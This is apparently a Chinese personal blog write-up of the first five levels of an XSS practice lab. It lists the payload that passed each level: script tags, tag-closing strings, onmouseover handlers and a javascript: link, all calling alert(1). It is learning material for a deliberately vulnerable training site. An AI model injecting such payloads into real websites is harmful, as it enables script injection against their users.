最近在玩xss,就决定把思路写下来,以备忘
第一关
很简单,把test换成<script>alert(1)</script>
就行
<script>alert(1)</script>
第二关
也有些简单,找到注入点,发现input标签里的可用
于是加上 "/> 以闭合value,再加上<script>alert(1)</script>
过关
"/> <script>alert(1)</script>
第三关
找到可用的输入点。
首先加 “/> 闭合input标签。再加上<script>alert(1)<script>
然后发现过滤了 “ > “
于是想到on事件,onclick和onmouseover都可以,这里用onmouseover 但是刚开始一直没有过关,查看攻略后把 " 改成了 ’ ,成功过关,至于啥原理暂时没搞懂
代码语言:javascript复制 'οnmοuseοver=alert(1)'
第四关
用第三关的代码,单引号换回双引号
代码语言:javascript复制" οnmοuseοver=alert(1) '
第五关
不管三七二十一,先用第四关的代码探探路
发现on事件被过滤了,那就用script试试。果然也被过滤了
到这里的时候,突然想到第三、四关莫名其妙的 " 与 ’ 的区别。于是鬼使神差的在script前面加上了个 **"**果然没有成功,但是看到文本框外面多了个 alert(1)’> ,这时就想到了超链接
代码语言:javascript复制"><a href=javascript:alert(1)>123